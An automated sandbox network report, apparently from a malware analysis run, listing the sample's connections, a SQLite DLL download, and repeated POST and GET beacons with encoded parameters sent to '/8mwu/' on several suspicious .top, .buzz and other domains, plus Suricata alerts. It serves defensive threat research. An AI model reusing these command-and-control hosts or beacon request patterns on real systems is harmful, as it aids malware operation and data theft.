Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 108.181.20.35 | Active | Moloch |
| 104.21.73.200 | Active | Moloch |
| 162.43.104.75 | Active | Moloch |
| 164.124.101.2 | Active | Moloch |
| 192.250.196.82 | Active | Moloch |
| 203.161.55.144 | Active | Moloch |
| 204.11.56.48 | Active | Moloch |
| 206.119.167.205 | Active | Moloch |
| 45.33.6.223 | Active | Moloch |
| 52.74.11.229 | Active | Moloch |
| 68.178.150.54 | Active | Moloch |
- TCP Requests
-
-
108.181.20.35:443 192.168.56.101:49596
-
192.168.56.101:49178 104.21.73.200:80www.framedeals.buzz
-
192.168.56.101:49179 104.21.73.200:80www.framedeals.buzz
-
192.168.56.101:49168 162.43.104.75:80www.date-store.info
-
192.168.56.101:49169 162.43.104.75:80www.date-store.info
-
192.168.56.101:49174 192.250.196.82:80www.niubiseo158.top
-
192.168.56.101:49175 192.250.196.82:80www.niubiseo158.top
-
192.168.56.101:49172 203.161.55.144:80www.snazzy.top
-
192.168.56.101:49173 203.161.55.144:80www.snazzy.top
-
192.168.56.101:49176 204.11.56.48:80www.homesalerealtywi.com
-
192.168.56.101:49177 204.11.56.48:80www.homesalerealtywi.com
-
192.168.56.101:49167 45.33.6.223:80www.sqlite.org
-
192.168.56.101:49165 52.74.11.229:80www.baotrang-jewelry.com
-
192.168.56.101:49166 52.74.11.229:80www.baotrang-jewelry.com
-
192.168.56.101:49170 68.178.150.54:80www.investmentmastr.com
-
192.168.56.101:49171 68.178.150.54:80www.investmentmastr.com
-
- UDP Requests
-
-
192.168.56.101:52753 164.124.101.2:53
-
192.168.56.101:52797 164.124.101.2:53
-
192.168.56.101:52815 164.124.101.2:53
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:54883 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:58297 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:61950 164.124.101.2:53
-
192.168.56.101:137 192.168.56.103:137
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:53853 239.255.255.250:1900
-
POST
301
http://www.baotrang-jewelry.com/8mwu/
REQUEST
RESPONSE
BODY
POST /8mwu/ HTTP/1.1
Host: www.baotrang-jewelry.com
Connection: close
Content-Length: 177
Cache-Control: no-cache
Origin: http://www.baotrang-jewelry.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.baotrang-jewelry.com/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 12 Jul 2023 08:37:04 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.baotrang-jewelry.com/8mwu/
GET
301
http://www.baotrang-jewelry.com/8mwu/?m9izrh97=EU3iIBTa7/FiG89Zkn9giTIgWQjAgZeKQjtjqA56CDWeG/Y64M9bd0fUJ8VEDSTetbKxDk1W+HVeVL/Bv/O0oK42dWysymJF/Fz7e18=&NA=YcFFh3pmG-c-6
REQUEST
RESPONSE
BODY
GET /8mwu/?m9izrh97=EU3iIBTa7/FiG89Zkn9giTIgWQjAgZeKQjtjqA56CDWeG/Y64M9bd0fUJ8VEDSTetbKxDk1W+HVeVL/Bv/O0oK42dWysymJF/Fz7e18=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.baotrang-jewelry.com
Connection: close
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 12 Jul 2023 08:37:07 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Location: https://www.baotrang-jewelry.com/8mwu/?m9izrh97=EU3iIBTa7/FiG89Zkn9giTIgWQjAgZeKQjtjqA56CDWeG/Y64M9bd0fUJ8VEDSTetbKxDk1W+HVeVL/Bv/O0oK42dWysymJF/Fz7e18=&NA=YcFFh3pmG-c-6
GET
200
http://www.sqlite.org/2018/sqlite-dll-win32-x86-3260000.zip
REQUEST
RESPONSE
BODY
GET /2018/sqlite-dll-win32-x86-3260000.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: www.sqlite.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Date: Wed, 12 Jul 2023 08:37:08 GMT
Last-Modified: Tue, 05 Feb 2019 16:46:41 GMT
Cache-Control: max-age=120
ETag: "m5c59bdf1s747df"
Content-type: application/zip; charset=utf-8
Content-length: 477151
POST
301
http://www.date-store.info/8mwu/
REQUEST
RESPONSE
BODY
POST /8mwu/ HTTP/1.1
Host: www.date-store.info
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.date-store.info
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.date-store.info/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 12 Jul 2023 08:37:17 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 241
Connection: close
Location: https://www.date-store.info/8mwu/
GET
301
http://www.date-store.info/8mwu/?m9izrh97=QCWughoEBLNWlxoKJazXJvFVptHaudS5CtBHXaoHYx4YCXEq+K4liCb7WZlVD+RMuH5kCBUqy3mcV+3Nr6i4SxN+kY5cxzsbKOKS/94=&NA=YcFFh3pmG-c-6
REQUEST
RESPONSE
BODY
GET /8mwu/?m9izrh97=QCWughoEBLNWlxoKJazXJvFVptHaudS5CtBHXaoHYx4YCXEq+K4liCb7WZlVD+RMuH5kCBUqy3mcV+3Nr6i4SxN+kY5cxzsbKOKS/94=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.date-store.info
Connection: close
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 12 Jul 2023 08:37:20 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 376
Connection: close
Location: https://www.date-store.info/8mwu/?m9izrh97=QCWughoEBLNWlxoKJazXJvFVptHaudS5CtBHXaoHYx4YCXEq+K4liCb7WZlVD+RMuH5kCBUqy3mcV+3Nr6i4SxN+kY5cxzsbKOKS/94=&NA=YcFFh3pmG-c-6
POST
404
http://www.investmentmastr.com/8mwu/
REQUEST
RESPONSE
BODY
POST /8mwu/ HTTP/1.1
Host: www.investmentmastr.com
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.investmentmastr.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.investmentmastr.com/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:37:25 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
GET
404
http://www.investmentmastr.com/8mwu/?m9izrh97=PsH7VurMFQyD6ju4MnYVKLsngyhRF0i3kpEyk+bvF+v2WbyUoo2xQnfNKDF27FubHa/Uq1yd2iymJaC1K/rhLY6C/0yWRYEJmyt9xCA=&NA=YcFFh3pmG-c-6
REQUEST
RESPONSE
BODY
GET /8mwu/?m9izrh97=PsH7VurMFQyD6ju4MnYVKLsngyhRF0i3kpEyk+bvF+v2WbyUoo2xQnfNKDF27FubHa/Uq1yd2iymJaC1K/rhLY6C/0yWRYEJmyt9xCA=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.investmentmastr.com
Connection: close
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:37:28 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
POST
404
http://www.snazzy.top/8mwu/
REQUEST
RESPONSE
BODY
POST /8mwu/ HTTP/1.1
Host: www.snazzy.top
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.snazzy.top
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.snazzy.top/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:37:39 GMT
Server: Apache
Content-Length: 1414
Connection: close
Content-Type: text/html
GET
404
http://www.snazzy.top/8mwu/?m9izrh97=hq4LUNPbOJJ32NO4taYz6MbqZKFszgoxkz2vk6DroaZ2ot5/vFuGkg9TSETWpPkUvR5zvHY4W4/OsVbmF+Jpeu4hTeI286k5D1jdj0E=&NA=YcFFh3pmG-c-6
REQUEST
RESPONSE
BODY
GET /8mwu/?m9izrh97=hq4LUNPbOJJ32NO4taYz6MbqZKFszgoxkz2vk6DroaZ2ot5/vFuGkg9TSETWpPkUvR5zvHY4W4/OsVbmF+Jpeu4hTeI286k5D1jdj0E=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.snazzy.top
Connection: close
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:37:42 GMT
Server: Apache
Content-Length: 1414
Connection: close
Content-Type: text/html; charset=utf-8
POST
200
http://www.niubiseo158.top/8mwu/
REQUEST
RESPONSE
BODY
POST /8mwu/ HTTP/1.1
Host: www.niubiseo158.top
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.niubiseo158.top
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.niubiseo158.top/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Jul 2023 08:37:48 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
GET
200
http://www.niubiseo158.top/8mwu/?m9izrh97=DpBsY/EqeNdrZFzJBhJgkE6I4JhtuhKG/ihhRdK7+ZddsX/RTtTF+8Mul1ZbonjYts59d9bhAh3cEH3KC86wGfwsRy2myXMRgqa2uDs=&NA=YcFFh3pmG-c-6
REQUEST
RESPONSE
BODY
GET /8mwu/?m9izrh97=DpBsY/EqeNdrZFzJBhJgkE6I4JhtuhKG/ihhRdK7+ZddsX/RTtTF+8Mul1ZbonjYts59d9bhAh3cEH3KC86wGfwsRy2myXMRgqa2uDs=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.niubiseo158.top
Connection: close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Jul 2023 08:37:50 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
POST
0
http://www.homesalerealtywi.com/8mwu/
REQUEST
RESPONSE
BODY
POST /8mwu/ HTTP/1.1
Host: www.homesalerealtywi.com
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.homesalerealtywi.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.homesalerealtywi.com/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
GET
200
http://www.homesalerealtywi.com/8mwu/?m9izrh97=oINJ/gp/aJeJF1lmtDttIp5zYupEQ9+i41jy+2inlUmQPi8yQegxtF+73D7Viv9VJKhdmECNx8qtF80OZhRsVw7SvxMGhJ4ooOkNn5A=&NA=YcFFh3pmG-c-6
REQUEST
RESPONSE
BODY
GET /8mwu/?m9izrh97=oINJ/gp/aJeJF1lmtDttIp5zYupEQ9+i41jy+2inlUmQPi8yQegxtF+73D7Viv9VJKhdmECNx8qtF80OZhRsVw7SvxMGhJ4ooOkNn5A=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.homesalerealtywi.com
Connection: close
HTTP/1.1 200 OK
Date: Wed, 12 Jul 2023 08:37:59 GMT
Server: Apache
Set-Cookie: vsid=932vr436696679052749070; expires=Mon, 10-Jul-2028 08:37:59 GMT; Max-Age=157680000; path=/; domain=www.homesalerealtywi.com; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_SP5pzzsqfGMkxxt0vujZe/TaEyhdrAv3PcfQmNYn1QM5iiobcfuxXtgyROrB+pAclOVwqatUofhH9/wWcd8iPQ==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Connection: close
POST
404
http://www.framedeals.buzz/8mwu/
REQUEST
RESPONSE
BODY
POST /8mwu/ HTTP/1.1
Host: www.framedeals.buzz
Connection: close
Content-Length: 189
Cache-Control: no-cache
Origin: http://www.framedeals.buzz
User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.framedeals.buzz/8mwu/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:38:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IQ4gXrOp6g6hbYsUXp2eoYMZGf2ZeEaJj6HfIuBO0HoLfSEjVcxfS9RpdHqV4j6MaznwbpaMzIiW8vGlLdcej70B3gkV%2Fl5z5ZEP5C4S5c8jdchIa0WBuLwVUf4oI99egz6uf%2Bv9"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7e57f7c8fd21833b-KIX
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
GET
404
http://www.framedeals.buzz/8mwu/?m9izrh97=VWM5CmNEXV0Wws5lOi41B/CT5DkRJBR63DKPnwmZQhPPNIeL3HbUg+RwDwZOLCkdO7WSUUICcQ5s3r8q/6yBYhvdm+7LZZAalqtbZFE=&NA=YcFFh3pmG-c-6
REQUEST
RESPONSE
BODY
GET /8mwu/?m9izrh97=VWM5CmNEXV0Wws5lOi41B/CT5DkRJBR63DKPnwmZQhPPNIeL3HbUg+RwDwZOLCkdO7WSUUICcQ5s3r8q/6yBYhvdm+7LZZAalqtbZFE=&NA=YcFFh3pmG-c-6 HTTP/1.1
Host: www.framedeals.buzz
Connection: close
HTTP/1.1 404 Not Found
Date: Wed, 12 Jul 2023 08:38:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
x-turbo-charged-by: LiteSpeed
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GByKZ2ey1jLTDj7pLJGpMIczPmTNVBgT7kp%2FP8qGxR%2Bel6eu7C3yANyGZifgt2alpf8Yr4KWJAqG8gSjO8NCViMe3n0%2FySHiGQ1%2BTgcPLFBzvPQsTbXjf1gJSm6p7g2RKf%2BB8rWT"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7e57f7d8ccf21a0c-KIX
alt-svc: h3=":443"; ma=86400
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| UDP 192.168.56.101:54883 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
| UDP 192.168.56.101:52753 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
| TCP 192.168.56.101:49178 -> 104.21.73.200:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
| TCP 192.168.56.101:49174 -> 192.250.196.82:80 | 2023882 | ET INFO HTTP Request to a *.top domain | Potentially Bad Traffic |
| TCP 192.168.56.101:49175 -> 192.250.196.82:80 | 2031089 | ET HUNTING Request to .TOP Domain with Minimal Headers | Potentially Bad Traffic |
| TCP 192.168.56.101:49179 -> 104.21.73.200:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
| TCP 192.168.56.101:49173 -> 203.161.55.144:80 | 2031089 | ET HUNTING Request to .TOP Domain with Minimal Headers | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts